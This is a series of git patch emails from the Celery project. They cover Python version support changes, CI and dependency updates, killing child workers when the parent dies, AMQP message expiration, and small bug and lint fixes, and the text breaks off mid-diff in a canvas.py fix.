Subject: [PATCH 054/177] update supported python versions on readme
---
README.rst | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.rst b/README.rst
index ac0f3e31150..47c811fbe23 100644
--- a/README.rst
+++ b/README.rst
@@ -59,8 +59,8 @@ What do I need?
Celery version 5.2.0b2 runs on,
-- Python (3.6, 3.7, 3.8, 3.9)
-- PyPy3.6 (7.6)
+- Python (3.7, 3.8, 3.9, 3.10)
+- PyPy3.7 (7.3+)
This is the next version of celery which will support Python 3.6 or newer.
From 816ab05e715bdf410aa2bec46a56f9838a84780e Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Tue, 31 Aug 2021 15:15:50 +0300
Subject: [PATCH 055/177] [pre-commit.ci] pre-commit autoupdate (#6935)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/pyupgrade: v2.24.0 → v2.25.0](https://github.com/asottile/pyupgrade/compare/v2.24.0...v2.25.0)
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index c05c93b2734..96762be07c8 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/asottile/pyupgrade
- rev: v2.24.0
+ rev: v2.25.0
hooks:
- id: pyupgrade
args: ["--py36-plus"]
From 42745cf43c245dd42a92cd8e1ed76699f19d1989 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 31 Aug 2021 15:14:28 +0300
Subject: [PATCH 056/177] Remove appveyor configuration since we migrated to
GA.
---
appveyor.yml | 58 ----------------------------------------------------
1 file changed, 58 deletions(-)
delete mode 100644 appveyor.yml
diff --git a/appveyor.yml b/appveyor.yml
deleted file mode 100644
index 666932d9540..00000000000
--- a/appveyor.yml
+++ /dev/null
@@ -1,58 +0,0 @@
-environment:
-
- global:
- # SDK v7.0 MSVC Express 2008's SetEnv.cmd script will fail if the
- # /E:ON and /V:ON options are not enabled in the batch script intepreter
- # See: https://stackoverflow.com/a/13751649/163740
- WITH_COMPILER: "cmd /E:ON /V:ON /C .\\extra\\appveyor\\run_with_compiler.cmd"
-
- matrix:
-
- # Pre-installed Python versions, which Appveyor may upgrade to
- # a later point release.
- # See: https://www.appveyor.com/docs/installed-software#python
-
- - PYTHON: "C:\\Python36-x64"
- PYTHON_VERSION: "3.6.x"
- PYTHON_ARCH: "64"
- WINDOWS_SDK_VERSION: "v7.1"
- TOXENV: "3.6-unit"
-
- - PYTHON: "C:\\Python37-x64"
- PYTHON_VERSION: "3.7.x"
- PYTHON_ARCH: "64"
- WINDOWS_SDK_VERSION: "v7.1"
- TOXENV: "3.7-unit"
-
- - PYTHON: "C:\\Python38-x64"
- PYTHON_VERSION: "3.8.x"
- PYTHON_ARCH: "64"
- WINDOWS_SDK_VERSION: "v7.1"
- TOXENV: "3.8-unit"
-
-
-init:
- - "ECHO %PYTHON% %PYTHON_VERSION% %PYTHON_ARCH%"
-
-install:
- - "powershell extra\\appveyor\\install.ps1"
- - "%PYTHON%/python -m pip install -U pip setuptools tox"
- - "%PYTHON%/Scripts/pip.exe install -U eventlet"
- - "%PYTHON%/Scripts/pip.exe install -U -r requirements/extras/thread.txt"
-
-build: off
-
-test_script:
- - "%WITH_COMPILER% %PYTHON%/Scripts/tox -v -- -v"
-
-after_test:
- - "%WITH_COMPILER% %PYTHON%/python setup.py bdist_wheel"
-
-artifacts:
- - path: dist\*
-
-cache:
- - '%LOCALAPPDATA%\pip\Cache'
-
-#on_success:
-# - TODO: upload the content of dist/*.whl to a public wheelhouse
From fc20c44ae400e7ebf048d7c1b3c4fc8b8f3562e8 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 31 Aug 2021 15:17:08 +0300
Subject: [PATCH 057/177] pyugrade is now set to upgrade code to 3.7.
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 96762be07c8..a1807946d9b 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -3,7 +3,7 @@ repos:
rev: v2.25.0
hooks:
- id: pyupgrade
- args: ["--py36-plus"]
+ args: ["--py37-plus"]
- repo: https://github.com/PyCQA/flake8
rev: 3.9.2
From 27ebeaebf6b5720767b05cb0c62ef5f591d4d23f Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 31 Aug 2021 15:19:39 +0300
Subject: [PATCH 058/177] Drop exclude statement since we no longer test with
pypy-3.6.
---
.github/workflows/python-package.yml | 3 ---
1 file changed, 3 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 0c1855b7ebb..a47283da6ac 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -26,9 +26,6 @@ jobs:
matrix:
python-version: ['3.7', '3.8', '3.9', '3.10.0-rc.1', 'pypy-3.7']
os: ["ubuntu-20.04", "windows-2019"]
- exclude:
- - os: windows-2019
- python-version: 'pypy-3.6'
steps:
- name: Install apt packages
From 602d4e1ebfd8abf27d01760979ff0637b2bede17 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 31 Aug 2021 15:20:14 +0300
Subject: [PATCH 059/177] 3.10 is not GA so it's not supported yet.
---
README.rst | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.rst b/README.rst
index 47c811fbe23..82b1ac6f047 100644
--- a/README.rst
+++ b/README.rst
@@ -59,7 +59,7 @@ What do I need?
Celery version 5.2.0b2 runs on,
-- Python (3.7, 3.8, 3.9, 3.10)
+- Python (3.7, 3.8, 3.9)
- PyPy3.7 (7.3+)
From a1e503e487edf31ca1e02c3cfd475a965b37556b Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 31 Aug 2021 15:20:45 +0300
Subject: [PATCH 060/177] Celery 5.1 or earlier support Python 3.6.
---
README.rst | 1 +
1 file changed, 1 insertion(+)
diff --git a/README.rst b/README.rst
index 82b1ac6f047..1aca1c075c2 100644
--- a/README.rst
+++ b/README.rst
@@ -72,6 +72,7 @@ an older version of Celery:
- Python 2.5: Celery series 3.0 or earlier.
- Python 2.4: Celery series 2.2 or earlier.
- Python 2.7: Celery 4.x series.
+- Python 3.6: Celery 5.1 or earlier.
Celery is a project with minimal funding,
so we don't support Microsoft Windows.
From 9e435228cb106588f408ae71b9d703ff81a80531 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 31 Aug 2021 15:21:48 +0300
Subject: [PATCH 061/177] Fix linting error.
---
t/unit/backends/test_arangodb.py | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/t/unit/backends/test_arangodb.py b/t/unit/backends/test_arangodb.py
index 992c21a8ef4..4486f0b52c0 100644
--- a/t/unit/backends/test_arangodb.py
+++ b/t/unit/backends/test_arangodb.py
@@ -83,7 +83,7 @@ def test_config_params(self):
assert x.collection == 'celery_collection'
assert x.http_protocol == 'https'
assert x.arangodb_url == 'https://test.arangodb.com:8529'
- assert x.verify == True
+ assert x.verify is True
def test_backend_by_url(
self, url="arangodb://username:password@host:port/database/collection"
@@ -108,7 +108,7 @@ def test_backend_params_by_url(self):
assert x.collection == 'celery_collection'
assert x.http_protocol == 'http'
assert x.arangodb_url == 'http://test.arangodb.com:8529'
- assert x.verify == False
+ assert x.verify is False
def test_backend_cleanup(self):
now = datetime.datetime.utcnow()
From 5c47c1ff1aebd04b8e6b47255414e6f121b5c59f Mon Sep 17 00:00:00 2001
From: maybe-sybr <58414429+maybe-sybr@users.noreply.github.com>
Date: Fri, 3 Sep 2021 00:02:16 +1000
Subject: [PATCH 062/177] fix: Pass a `Context` when chaining fail results
(#6899)
This change ensures that during chaining of failure results, we always
reconstruct a `Context` objects for the request rather than sometimes
passing a dictionary to the backend. This avoids upsetting expectations
in the backend implementations which often expect to be able to use
dotted attribute access on the `request` they are passed
Fixes #6882
---
celery/backends/base.py | 40 +++++++++++++++++++++++-----------------
1 file changed, 23 insertions(+), 17 deletions(-)
diff --git a/celery/backends/base.py b/celery/backends/base.py
index 91327ea2190..ffbd1d0307c 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -185,29 +185,35 @@ def mark_as_failure(self, task_id, exc,
except (AttributeError, TypeError):
chain_data = tuple()
for chain_elem in chain_data:
- chain_elem_opts = chain_elem['options']
+ # Reconstruct a `Context` object for the chained task which has
+ # enough information to for backends to work with
+ chain_elem_ctx = Context(chain_elem)
+ chain_elem_ctx.update(chain_elem_ctx.options)
+ chain_elem_ctx.id = chain_elem_ctx.options.get('task_id')
+ chain_elem_ctx.group = chain_elem_ctx.options.get('group_id')
# If the state should be propagated, we'll do so for all
# elements of the chain. This is only truly important so
# that the last chain element which controls completion of
# the chain itself is marked as completed to avoid stalls.
- if store_result and state in states.PROPAGATE_STATES:
- try:
- chained_task_id = chain_elem_opts['task_id']
- except KeyError:
- pass
- else:
- self.store_result(
- chained_task_id, exc, state,
- traceback=traceback, request=chain_elem
- )
+ #
+ # Some chained elements may be complex signatures and have no
+ # task ID of their own, so we skip them hoping that not
+ # descending through them is OK. If the last chain element is
+ # complex, we assume it must have been uplifted to a chord by
+ # the canvas code and therefore the condition below will ensure
+ # that we mark something as being complete as avoid stalling.
+ if (
+ store_result and state in states.PROPAGATE_STATES and
+ chain_elem_ctx.task_id is not None
+ ):
+ self.store_result(
+ chain_elem_ctx.task_id, exc, state,
+ traceback=traceback, request=chain_elem_ctx,
+ )
# If the chain element is a member of a chord, we also need
# to call `on_chord_part_return()` as well to avoid stalls.
- if 'chord' in chain_elem_opts:
- failed_ctx = Context(chain_elem)
- failed_ctx.update(failed_ctx.options)
- failed_ctx.id = failed_ctx.options['task_id']
- failed_ctx.group = failed_ctx.options['group_id']
- self.on_chord_part_return(failed_ctx, state, exc)
+ if 'chord' in chain_elem_ctx.options:
+ self.on_chord_part_return(chain_elem_ctx, state, exc)
# And finally we'll fire any errbacks
if call_errbacks and request.errbacks:
self._call_task_errbacks(request, exc, traceback)
From 917088f6987d99b51364e43353c6ef1ce8e02e24 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Thu, 2 Sep 2021 20:36:42 +0300
Subject: [PATCH 063/177] =?UTF-8?q?Bump=20version:=205.2.0b2=20=E2=86=92?=
=?UTF-8?q?=205.2.0b3?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.bumpversion.cfg | 2 +-
README.rst | 6 +++---
celery/__init__.py | 2 +-
docs/includes/introduction.txt | 2 +-
4 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index 90de144c22e..cf0e85fec33 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.2.0b2
+current_version = 5.2.0b3
commit = True
tag = True
parse = (?P\d+)\.(?P\d+)\.(?P\d+)(?P[a-z\d]+)?
diff --git a/README.rst b/README.rst
index 1aca1c075c2..9a6b2335717 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.2.0b2 (dawn-chorus)
+:Version: 5.2.0b3 (dawn-chorus)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
@@ -57,7 +57,7 @@ in such a way that the client enqueues an URL to be requested by a worker.
What do I need?
===============
-Celery version 5.2.0b2 runs on,
+Celery version 5.2.0b3 runs on,
- Python (3.7, 3.8, 3.9)
- PyPy3.7 (7.3+)
@@ -90,7 +90,7 @@ Get Started
===========
If this is the first time you're trying to use Celery, or you're
-new to Celery 5.0.5 or 5.2.0b2 coming from previous versions then you should read our
+new to Celery 5.0.5 or 5.2.0b3 coming from previous versions then you should read our
getting started tutorials:
- `First steps with Celery`_
diff --git a/celery/__init__.py b/celery/__init__.py
index 6248ddec82c..3fdffce06ca 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -17,7 +17,7 @@
SERIES = 'dawn-chorus'
-__version__ = '5.2.0b2'
+__version__ = '5.2.0b3'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 5cf7b344ea5..48c25ce0f07 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,4 +1,4 @@
-:Version: 5.2.0b2 (cliffs)
+:Version: 5.2.0b3 (cliffs)
:Web: http://celeryproject.org/
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
From 8ae12153212e2b54a6d0e9fa633b9139321d7585 Mon Sep 17 00:00:00 2001
From: Matus Valo
Date: Sun, 5 Sep 2021 18:09:31 +0200
Subject: [PATCH 064/177] Kill all workers when main process exits in prefork
model (#6942)
* Kill all workers when main process exits in prefork model
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
* Make flake8 happy
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
celery/concurrency/prefork.py | 2 ++
celery/platforms.py | 11 ++++++++++
t/unit/concurrency/test_prefork.py | 32 +++++++++++++++++++++---------
t/unit/utils/test_platforms.py | 14 ++++++++++++-
4 files changed, 49 insertions(+), 10 deletions(-)
diff --git a/celery/concurrency/prefork.py b/celery/concurrency/prefork.py
index a764611444a..40772ebae1a 100644
--- a/celery/concurrency/prefork.py
+++ b/celery/concurrency/prefork.py
@@ -41,6 +41,8 @@ def process_initializer(app, hostname):
Initialize the child pool process to ensure the correct
app instance is used and things like logging works.
"""
+ # Each running worker gets SIGKILL by OS when main process exits.
+ platforms.set_pdeathsig('SIGKILL')
_set_task_join_will_block(True)
platforms.signals.reset(*WORKER_SIGRESET)
platforms.signals.ignore(*WORKER_SIGIGNORE)
diff --git a/celery/platforms.py b/celery/platforms.py
index d2fe02bede3..8af1876fde6 100644
--- a/celery/platforms.py
+++ b/celery/platforms.py
@@ -17,6 +17,7 @@
from contextlib import contextmanager
from billiard.compat import close_open_fds, get_fdmax
+from billiard.util import set_pdeathsig as _set_pdeathsig
# fileno used to be in this module
from kombu.utils.compat import maybe_fileno
from kombu.utils.encoding import safe_str
@@ -708,6 +709,16 @@ def strargv(argv):
return ''
+def set_pdeathsig(name):
+ """Sends signal ``name`` to process when parent process terminates."""
+ if signals.supported('SIGKILL'):
+ try:
+ _set_pdeathsig(signals.signum('SIGKILL'))
+ except OSError:
+ # We ignore when OS does not support set_pdeathsig
+ pass
+
+
def set_process_title(progname, info=None):
"""Set the :command:`ps` name for the currently running process.
diff --git a/t/unit/concurrency/test_prefork.py b/t/unit/concurrency/test_prefork.py
index f240123a448..713b63d7baf 100644
--- a/t/unit/concurrency/test_prefork.py
+++ b/t/unit/concurrency/test_prefork.py
@@ -53,11 +53,18 @@ def get(self):
return self.value
+@patch('celery.platforms.set_mp_process_title')
class test_process_initializer:
+ @staticmethod
+ def Loader(*args, **kwargs):
+ loader = Mock(*args, **kwargs)
+ loader.conf = {}
+ loader.override_backends = {}
+ return loader
+
@patch('celery.platforms.signals')
- @patch('celery.platforms.set_mp_process_title')
- def test_process_initializer(self, set_mp_process_title, _signals):
+ def test_process_initializer(self, _signals, set_mp_process_title):
with mock.restore_logging():
from celery import signals
from celery._state import _tls
@@ -67,13 +74,7 @@ def test_process_initializer(self, set_mp_process_title, _signals):
on_worker_process_init = Mock()
signals.worker_process_init.connect(on_worker_process_init)
- def Loader(*args, **kwargs):
- loader = Mock(*args, **kwargs)
- loader.conf = {}
- loader.override_backends = {}
- return loader
-
- with self.Celery(loader=Loader) as app:
+ with self.Celery(loader=self.Loader) as app:
app.conf = AttributeDict(DEFAULTS)
process_initializer(app, 'awesome.worker.com')
_signals.ignore.assert_any_call(*WORKER_SIGIGNORE)
@@ -100,6 +101,19 @@ def Loader(*args, **kwargs):
finally:
os.environ.pop('CELERY_LOG_FILE', None)
+ @patch('celery.platforms.set_pdeathsig')
+ def test_pdeath_sig(self, _set_pdeathsig, set_mp_process_title):
+ with mock.restore_logging():
+ from celery import signals
+ on_worker_process_init = Mock()
+ signals.worker_process_init.connect(on_worker_process_init)
+ from celery.concurrency.prefork import process_initializer
+
+ with self.Celery(loader=self.Loader) as app:
+ app.conf = AttributeDict(DEFAULTS)
+ process_initializer(app, 'awesome.worker.com')
+ _set_pdeathsig.assert_called_once_with('SIGKILL')
+
class test_process_destructor:
diff --git a/t/unit/utils/test_platforms.py b/t/unit/utils/test_platforms.py
index f0b1fde8d3a..4100ad56560 100644
--- a/t/unit/utils/test_platforms.py
+++ b/t/unit/utils/test_platforms.py
@@ -18,7 +18,7 @@
close_open_fds, create_pidlock, detached,
fd_by_path, get_fdmax, ignore_errno, initgroups,
isatty, maybe_drop_privileges, parse_gid,
- parse_uid, set_mp_process_title,
+ parse_uid, set_mp_process_title, set_pdeathsig,
set_process_title, setgid, setgroups, setuid,
signals)
from celery.utils.text import WhateverIO
@@ -170,6 +170,18 @@ def test_setitem_raises(self, set):
signals['INT'] = lambda *a: a
+class test_set_pdeathsig:
+
+ def test_call(self):
+ set_pdeathsig('SIGKILL')
+
+ @t.skip.if_win32
+ def test_call_with_correct_parameter(self):
+ with patch('celery.platforms._set_pdeathsig') as _set_pdeathsig:
+ set_pdeathsig('SIGKILL')
+ _set_pdeathsig.assert_called_once_with(signal.SIGKILL)
+
+
@t.skip.if_win32
class test_get_fdmax:
From 61587d12033d289d3004974a91c054d7b4360f8d Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 7 Sep 2021 19:57:06 +0600
Subject: [PATCH 065/177] test kombu 5.2.0rc1 (#6947)
---
requirements/default.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/default.txt b/requirements/default.txt
index b892226269a..6d28411082d 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -1,6 +1,6 @@
pytz>dev
billiard>=3.6.4.0,<4.0
-kombu>=5.1.0,<6.0
+kombu>=5.2.0rc1,<6.0
vine>=5.0.0,<6.0
click>=8.0,<9.0
click-didyoumean>=0.0.3
From b686c6e66fb07238a2a7a7a22c542069f9e2db9a Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 7 Sep 2021 20:24:32 +0600
Subject: [PATCH 066/177] try moto 2.2.x (#6948)
---
requirements/test.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/test.txt b/requirements/test.txt
index 0325981f8e8..0dd666f70bf 100644
--- a/requirements/test.txt
+++ b/requirements/test.txt
@@ -4,7 +4,7 @@ pytest-celery
pytest-subtests
pytest-timeout~=1.4.2
boto3>=1.9.178
-moto==2.0.10
+moto>=2.2.6
pre-commit
-r extras/yaml.txt
-r extras/msgpack.txt
From ac7cc1e1c6017ea4cc1eb11e7206d703cda1a2e3 Mon Sep 17 00:00:00 2001
From: Micah Lyle
Date: Sun, 23 May 2021 08:34:42 -0700
Subject: [PATCH 067/177] Prepared Hacker News Post on Release Action
---
.../workflows/post_release_to_hacker_news.yml | 17 +++++++++++++++++
1 file changed, 17 insertions(+)
create mode 100644 .github/workflows/post_release_to_hacker_news.yml
diff --git a/.github/workflows/post_release_to_hacker_news.yml b/.github/workflows/post_release_to_hacker_news.yml
new file mode 100644
index 00000000000..d81bfb22c43
--- /dev/null
+++ b/.github/workflows/post_release_to_hacker_news.yml
@@ -0,0 +1,17 @@
+on:
+ release:
+ types: [released]
+
+jobs:
+ post_release_to_hacker_news:
+ runs-on: ubuntu-latest
+ name: Post Release to Hacker News
+ steps:
+ - name: Post the Release
+ uses: MicahLyle/github-action-post-to-hacker-news@v1
+ env:
+ HN_USERNAME: ${{ secrets.HN_USERNAME }}
+ HN_PASSWORD: ${{ secrets.HN_PASSWORD }}
+ HN_TITLE_FORMAT_SPECIFIER: Celery v%s Released!
+ HN_URL_FORMAT_SPECIFIER: https://docs.celeryproject.org/en/v%s/changelog.html
+ HN_TEST_MODE: true
From 590703c65d2c2b2e73019eb1cfbd18a25fdab0bb Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 7 Sep 2021 20:22:20 +0600
Subject: [PATCH 068/177] update setup with python 3.7 as minimum
---
setup.py | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/setup.py b/setup.py
index 7a760178a65..f81e2404f36 100644
--- a/setup.py
+++ b/setup.py
@@ -163,7 +163,7 @@ def run_tests(self):
license='BSD',
platforms=['any'],
install_requires=install_requires(),
- python_requires=">=3.6,",
+ python_requires=">=3.7,",
tests_require=reqs('test.txt'),
extras_require=extras_require(),
cmdclass={'test': pytest},
@@ -188,7 +188,6 @@ def run_tests(self):
"Programming Language :: Python",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3",
- "Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
From dc4bb4280c2e8a296522486b467278367b8faf09 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 7 Sep 2021 22:41:06 +0600
Subject: [PATCH 069/177] update kombu on setupcfg
---
setup.cfg | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/setup.cfg b/setup.cfg
index 3638e56dc6f..53909275c13 100644
--- a/setup.cfg
+++ b/setup.cfg
@@ -31,7 +31,7 @@ per-file-ignores =
[bdist_rpm]
requires = pytz >= 2016.7
billiard >= 3.6.3.0,<4.0
- kombu >= 4.6.8,<5.0.0
+ kombu >= 5.2.0rc1,<6.0.0
[bdist_wheel]
universal = 0
From 966a66dfcd4dda0e4f558bcc74c968747b16e2bf Mon Sep 17 00:00:00 2001
From: Matus Valo
Date: Mon, 6 Sep 2021 22:04:32 +0200
Subject: [PATCH 070/177] Added note about automatic killing all child
processes of worker after its termination
---
docs/userguide/workers.rst | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/docs/userguide/workers.rst b/docs/userguide/workers.rst
index 74e29490913..1e51c915e67 100644
--- a/docs/userguide/workers.rst
+++ b/docs/userguide/workers.rst
@@ -97,6 +97,11 @@ longer version:
$ ps auxww | awk '/celery worker/ {print $2}' | xargs kill -9
+.. versionchanged:: 5.2
+ On Linux systems, Celery now supports sending :sig:`KILL` signal to all child processes
+ after worker termination. This is done via `PR_SET_PDEATHSIG` option of ``prctl(2)``.
+
+
.. _worker-restarting:
Restarting the worker
From d3a4d07e16b169e3c056f1344cce68a07f3cf839 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 13 Sep 2021 16:33:50 +0000
Subject: [PATCH 071/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/asottile/pyupgrade: v2.25.0 → v2.26.0](https://github.com/asottile/pyupgrade/compare/v2.25.0...v2.26.0)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index a1807946d9b..d6a815ae694 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/asottile/pyupgrade
- rev: v2.25.0
+ rev: v2.26.0
hooks:
- id: pyupgrade
args: ["--py37-plus"]
From 6c9f7854bd5b26ea288cd5c002cf57375989c6da Mon Sep 17 00:00:00 2001
From: Matus Valo
Date: Thu, 16 Sep 2021 10:59:27 +0200
Subject: [PATCH 072/177] Move importskip before greenlet import (#6956)
* Move importskip before greenlet import
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
t/unit/concurrency/test_eventlet.py | 11 ++++++-----
1 file changed, 6 insertions(+), 5 deletions(-)
diff --git a/t/unit/concurrency/test_eventlet.py b/t/unit/concurrency/test_eventlet.py
index 9dcdb479b26..aff2d310368 100644
--- a/t/unit/concurrency/test_eventlet.py
+++ b/t/unit/concurrency/test_eventlet.py
@@ -2,10 +2,13 @@
from unittest.mock import Mock, patch
import pytest
-from greenlet import GreenletExit
-import t.skip
-from celery.concurrency.eventlet import TaskPool, Timer, apply_target
+pytest.importorskip('eventlet')
+
+from greenlet import GreenletExit # noqa
+
+import t.skip # noqa
+from celery.concurrency.eventlet import TaskPool, Timer, apply_target # noqa
eventlet_modules = (
'eventlet',
@@ -15,8 +18,6 @@
'greenlet',
)
-pytest.importorskip('eventlet')
-
@t.skip.if_pypy
class EventletCase:
From 1584138098900677dcc715d3918bd8a716f89e70 Mon Sep 17 00:00:00 2001
From: Nicolae Rosia
Date: Thu, 16 Sep 2021 15:48:20 +0300
Subject: [PATCH 073/177] amqp: send expiration field to broker if requested by
user (#6957)
* amqp: send expiration field to broker if requested by user
Signed-off-by: Nicolae Rosia
* fix for when expires is datetime
Signed-off-by: Nicolae Rosia
* compile fix
Signed-off-by: Nicolae Rosia
* improve codecov
Signed-off-by: Nicolae Rosia
* comment fix
Signed-off-by: Nicolae Rosia
* yet another test
Signed-off-by: Nicolae Rosia
---
celery/app/base.py | 10 ++++++++++
t/unit/tasks/test_tasks.py | 24 +++++++++++++++++++++++-
2 files changed, 33 insertions(+), 1 deletion(-)
diff --git a/celery/app/base.py b/celery/app/base.py
index 3df9577dbe1..5d072bb109e 100644
--- a/celery/app/base.py
+++ b/celery/app/base.py
@@ -732,6 +732,16 @@ def send_task(self, name, args=None, kwargs=None, countdown=None,
ignore_result = options.pop('ignore_result', False)
options = router.route(
options, route_name or name, args, kwargs, task_type)
+ if expires is not None:
+ if isinstance(expires, datetime):
+ expires_s = (expires - self.now()).total_seconds()
+ else:
+ expires_s = expires
+
+ if expires_s < 0:
+ expires_s = 0
+
+ options["expiration"] = expires_s
if not root_id or not parent_id:
parent = self.current_worker_task
diff --git a/t/unit/tasks/test_tasks.py b/t/unit/tasks/test_tasks.py
index 25229e7ba90..4beeaf967d0 100644
--- a/t/unit/tasks/test_tasks.py
+++ b/t/unit/tasks/test_tasks.py
@@ -930,7 +930,7 @@ def test_regular_task(self):
consumer, sresult, self.mytask.name, name='Elaine M. Benes',
)
- # With ETA.
+ # With ETA, absolute expires.
presult2 = self.mytask.apply_async(
kwargs={'name': 'George Costanza'},
eta=self.now() + timedelta(days=1),
@@ -941,6 +941,28 @@ def test_regular_task(self):
name='George Costanza', test_eta=True, test_expires=True,
)
+ # With ETA, absolute expires in the past.
+ presult2 = self.mytask.apply_async(
+ kwargs={'name': 'George Costanza'},
+ eta=self.now() + timedelta(days=1),
+ expires=self.now() - timedelta(days=2),
+ )
+ self.assert_next_task_data_equal(
+ consumer, presult2, self.mytask.name,
+ name='George Costanza', test_eta=True, test_expires=True,
+ )
+
+ # With ETA, relative expires.
+ presult2 = self.mytask.apply_async(
+ kwargs={'name': 'George Costanza'},
+ eta=self.now() + timedelta(days=1),
+ expires=2 * 24 * 60 * 60,
+ )
+ self.assert_next_task_data_equal(
+ consumer, presult2, self.mytask.name,
+ name='George Costanza', test_eta=True, test_expires=True,
+ )
+
# With countdown.
presult2 = self.mytask.apply_async(
kwargs={'name': 'George Costanza'}, countdown=10, expires=12,
From 34d9b7ee8dfee39192ccceb1ddb9bef5902ab802 Mon Sep 17 00:00:00 2001
From: John Zeringue
Date: Wed, 15 Sep 2021 12:19:41 -0400
Subject: [PATCH 074/177] Single line drift warning
The drift warning currently spans multiple lines, which causes issues
in some logging systems. Make it a single line message instead.
---
celery/events/state.py | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/celery/events/state.py b/celery/events/state.py
index 087131aeec3..febf1175145 100644
--- a/celery/events/state.py
+++ b/celery/events/state.py
@@ -51,10 +51,10 @@
#: before we alert that clocks may be unsynchronized.
HEARTBEAT_DRIFT_MAX = 16
-DRIFT_WARNING = """\
-Substantial drift from %s may mean clocks are out of sync. Current drift is
-%s seconds. [orig: %s recv: %s]
-"""
+DRIFT_WARNING = (
+ "Substantial drift from %s may mean clocks are out of sync. Current drift is "
+ "%s seconds. [orig: %s recv: %s]"
+)
logger = get_logger(__name__)
warn = logger.warning
From e2e3e95bf8ac9f85e1ee91753602c47bac878380 Mon Sep 17 00:00:00 2001
From: Erwin Van de Velde
Date: Fri, 17 Sep 2021 11:41:36 +0200
Subject: [PATCH 075/177] canvas: fix kwargs argument to prevent recursion
(#6810) (#6959)
* canvas: fix kwargs argument to prevent recursion (#6810)
* test for canvas: fix kwargs argument to prevent recursion (#6810)
Co-authored-by: Erwin Van de Velde
---
celery/canvas.py | 4 ++--
t/unit/tasks/test_chord.py | 18 ++++++++++++++++++
2 files changed, 20 insertions(+), 2 deletions(-)
diff --git a/celery/canvas.py b/celery/canvas.py
index 8a471ec0471..f3a8efce1d5 100644
--- a/celery/canvas.py
+++ b/celery/canvas.py
@@ -1352,10 +1352,10 @@ def _unpack_args(header=None, body=None, **kwargs):
def __init__(self, header, body=None, task='celery.chord',
args=None, kwargs=None, app=None, **options):
args = args if args else ()
